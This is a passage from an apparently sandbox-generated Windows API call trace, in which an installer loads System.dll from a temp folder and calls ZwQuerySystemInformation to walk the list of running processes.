returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.008] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.008] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0158.008] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0158.008] lstrcpynA (in: lpString1=0x42e3a0, lpString2="65536", iMaxLength=1024 | out: lpString1="65536") returned="65536" [0158.008] lstrlenA (lpString="65536") returned 5 [0158.010] lstrcpynA (in: lpString1=0x3217a4, lpString2="65536", iMaxLength=1024 | out: lpString1="65536") returned="65536" [0158.010] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.010] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.010] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.010] lstrcpynA (in: lpString1=0x40a418, lpString2="Alloc", iMaxLength=1024 | out: lpString1="Alloc") returned="Alloc" [0158.011] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.011] GetProcAddress (hModule=0x75710000, lpProcName="Alloc") returned 0x75711000 [0158.012] wsprintfA (in: param_1=0x18f5a4, param_2="%d" | out: param_1="3304744") returned 7 [0158.012] lstrcpynA (in: lpString1=0x336d34, lpString2="3304744", iMaxLength=1024 | out: lpString1="3304744") returned="3304744" [0158.012] lstrcpynA (in: lpString1=0x430c00, lpString2="3304744", iMaxLength=1024 | out: lpString1="3304744") returned="3304744" [0158.012] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.012] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.012] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.012] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.012] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.012] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.012] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.012] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.012] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.013] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0158.013] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0158.013] lstrcpynA (in: lpString1=0x42e3c7, lpString2="3304744", iMaxLength=1024 | out: lpString1="3304744") returned="3304744" [0158.013] lstrlenA (lpString="3304744") returned 7 [0158.013] lstrcpynA (in: lpString1=0x42e3d2, lpString2="65536", iMaxLength=1024 | out: lpString1="65536") returned="65536" [0158.013] lstrlenA (lpString="65536") returned 5 [0158.013] lstrcpynA (in: lpString1=0x336d34, lpString2="ntdll::ZwQuerySystemInformation(i 5, i 3304744, i 65536, i 0) i .r0", iMaxLength=1024 | out: lpString1="ntdll::ZwQuerySystemInformation(i 5, i 3304744, i 65536, i 0) i .r0") returned="ntdll::ZwQuerySystemInformation(i 5, i 3304744, i 65536, i 0) i .r0" [0158.013] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.013] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.013] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.013] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.014] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.014] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.014] lstrcpyA (in: lpString1=0x337548, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.014] lstrcpyA (in: lpString1=0x3217a8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.014] lstrcpyA (in: lpString1=0x321ba8, lpString2="ZwQuerySystemInformation" | out: lpString1="ZwQuerySystemInformation") returned="ZwQuerySystemInformation" [0158.014] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0158.015] GetProcAddress (hModule=0x77d30000, lpProcName="ZwQuerySystemInformation") returned 0x77d4fda0 [0158.015] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.016] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.016] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="65536") returned 5 [0158.016] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3304744") returned 7 [0158.016] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="5") returned 1 [0158.016] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.016] lstrcpyA (in: lpString1=0x430000, lpString2="0" | out: lpString1="0") returned="0" [0158.016] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.016] lstrlenA (lpString="0") returned 1 [0158.016] lstrcpynA (in: lpString1=0x40ac18, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.016] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.016] lstrcmpiA (lpString1="0", lpString2="0") returned 0 [0158.016] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3304744", iMaxLength=1024 | out: lpString1="3304744") returned="3304744" [0158.016] lstrlenA (lpString="3304744") returned 7 [0158.016] lstrcpynA (in: lpString1=0x40a418, lpString2="3304744", iMaxLength=1024 | out: lpString1="3304744") returned="3304744" [0158.016] lstrlenA (lpString="3304744") returned 7 [0158.016] lstrcpynA (in: lpString1=0x431c00, lpString2="3304744", iMaxLength=1024 | out: lpString1="3304744") returned="3304744" [0158.016] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.017] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.017] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.017] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.017] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.017] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.017] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.017] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.017] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.017] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0158.017] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0158.017] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3304744", iMaxLength=1024 | out: lpString1="3304744") returned="3304744" [0158.018] lstrlenA (lpString="3304744") returned 7 [0158.018] lstrcpynA (in: lpString1=0x336d34, lpString2="*3304744(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3304744(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3304744(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.018] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.018] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.018] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.018] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.018] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.018] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.018] lstrcpyA (in: lpString1=0x321ba8, lpString2="3304744" | out: lpString1="3304744") returned="3304744" [0158.018] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.018] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.019] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.019] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.019] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.019] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.019] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.019] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.019] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.019] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.019] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.019] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.019] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.019] lstrcpyA (in: lpString1=0x431800, lpString2="0" | out: lpString1="0") returned="0" [0158.019] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.019] lstrcpyA (in: lpString1=0x430800, lpString2="0" | out: lpString1="0") returned="0" [0158.019] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.019] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.019] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.019] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.019] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.020] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.020] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.020] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.020] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="248") returned 3 [0158.020] lstrcpyA (in: lpString1=0x431000, lpString2="248" | out: lpString1="248") returned="248" [0158.020] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3304744") returned 7 [0158.020] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.020] lstrlenA (lpString="1224") returned 4 [0158.020] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.020] lstrlenA (lpString="0") returned 1 [0158.020] lstrcpynA (in: lpString1=0x42e3a0, lpString2="248", iMaxLength=1024 | out: lpString1="248") returned="248" [0158.020] lstrlenA (lpString="248") returned 3 [0158.020] lstrcpynA (in: lpString1=0x40ac18, lpString2="248", iMaxLength=1024 | out: lpString1="248") returned="248" [0158.020] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.020] lstrcmpiA (lpString1="248", lpString2="0") returned 1 [0158.020] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3304744", iMaxLength=1024 | out: lpString1="3304744") returned="3304744" [0158.020] lstrlenA (lpString="3304744") returned 7 [0158.020] lstrcpynA (in: lpString1=0x42e3a0, lpString2="248", iMaxLength=1024 | out: lpString1="248") returned="248" [0158.020] lstrlenA (lpString="248") returned 3 [0158.020] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3304992") returned 7 [0158.020] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.020] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.020] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.020] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.020] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.020] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.021] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.021] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.021] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.021] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0158.021] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0158.021] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3304992", iMaxLength=1024 | out: lpString1="3304992") returned="3304992" [0158.021] lstrlenA (lpString="3304992") returned 7 [0158.021] lstrcpynA (in: lpString1=0x336d34, lpString2="*3304992(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3304992(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3304992(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.021] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.021] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.021] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.021] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.022] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.022] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.022] lstrcpyA (in: lpString1=0x321ba8, lpString2="3304992" | out: lpString1="3304992") returned="3304992" [0158.022] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.022] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.022] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.022] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.022] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.022] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.022] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.022] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.022] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.022] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.023] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.023] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.023] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.023] lstrcpyA (in: lpString1=0x431800, lpString2="0" | out: lpString1="0") returned="0" [0158.023] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="4") returned 1 [0158.023] lstrcpyA (in: lpString1=0x430800, lpString2="4" | out: lpString1="4") returned="4" [0158.023] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.023] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.023] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.023] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.023] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.023] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.023] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.023] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.023] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="5384") returned 4 [0158.023] lstrcpyA (in: lpString1=0x431000, lpString2="5384" | out: lpString1="5384") returned="5384" [0158.023] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3304992") returned 7 [0158.023] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.023] lstrlenA (lpString="1224") returned 4 [0158.023] lstrcpynA (in: lpString1=0x42e3a0, lpString2="4", iMaxLength=1024 | out: lpString1="4") returned="4" [0158.023] lstrlenA (lpString="4") returned 1 [0158.023] lstrcpynA (in: lpString1=0x42e3a0, lpString2="5384", iMaxLength=1024 | out: lpString1="5384") returned="5384" [0158.023] lstrlenA (lpString="5384") returned 4 [0158.023] lstrcpynA (in: lpString1=0x40ac18, lpString2="5384", iMaxLength=1024 | out: lpString1="5384") returned="5384" [0158.023] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.023] lstrcmpiA (lpString1="5384", lpString2="0") returned 1 [0158.023] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3304992", iMaxLength=1024 | out: lpString1="3304992") returned="3304992" [0158.023] lstrlenA (lpString="3304992") returned 7 [0158.023] lstrcpynA (in: lpString1=0x42e3a0, lpString2="5384", iMaxLength=1024 | out: lpString1="5384") returned="5384" [0158.023] lstrlenA (lpString="5384") returned 4 [0158.024] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3310376") returned 7 [0158.024] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.024] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.024] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.024] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.024] 